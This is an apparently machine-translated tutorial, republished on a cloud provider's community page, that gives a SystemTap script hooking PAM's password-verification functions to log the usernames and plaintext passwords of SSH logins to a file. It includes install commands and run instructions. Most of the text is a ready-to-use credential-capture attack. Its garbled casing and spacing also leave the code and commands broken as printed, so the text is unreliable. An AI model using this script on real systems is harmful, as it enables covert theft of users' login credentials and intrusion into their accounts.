Systemtap Monitor tool gets SSH username and password

Source: Internet
Author: User
Tags systemtap ssh

Systemtap is a very powerful kernel debugging tool that can debug a lot of questions about the kernel layer. Linux is through the PAM module to detect user information and authentication information, so as to determine whether a user can log on to the system, using this knowledge point, using SYSTEMTAP capture pam_unix.so The dynamic library file function calls, get users in the SSH remote login username and password bar.

Test environment: CentOS6.4 32bit

Kernel version: 2.6.32-358.el6.i686

First install the following RPM package
# Yum--releasever=6.4 Update
# yum Install-y Systemtap
# Debuginfo-install $ (rpm-qf/lib/security/pam_unix.so)

Create the file and write the following code
# TOUCH/ROOT/CAPTURE_PASS.STP
#!/usr/bin/stap
Global username, pass, Issuccret = 1;
Probe process ("/lib/security/pam_unix.so"). Function ("_unix_verify_password")
{
Username = user_string ($name);
pass = user_string ($p);
}
Probe process ("/lib/security/pam_unix.so"). Function ("_unix_verify_password"). return
{
if ($return = = 0)
{
printf ("User:%s\npassword:%s\n\n", username, pass);
Issuccret = 0;
}
}
Probe process ("/lib/security/pam_unix.so"). Function ("Pam_sm_open_session")
{
if (issuccret!= 0)
{
printf ("Login via ssh service.\n\user:%s\npassword:%s\n\n", username, pass);
}
Issuccret = 1;
}



Give executable permissions
chmod +x CAPTURE_PASS.STP
Create a file that records passwords
Touch Password.txt
Execute Systemstap Script
STAP Capture_pass.stp-o Password.txt



Local execution of the CAPTURE_PASS.STP script, while SSH telnet to the system, even if the first logon failure is not a problem, will not record the error password you are trying to enter. After successful login ctl+c terminate script run, view Password.txt, successfully capture. Systemstap is a powerful tool, so only the super households can use it.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.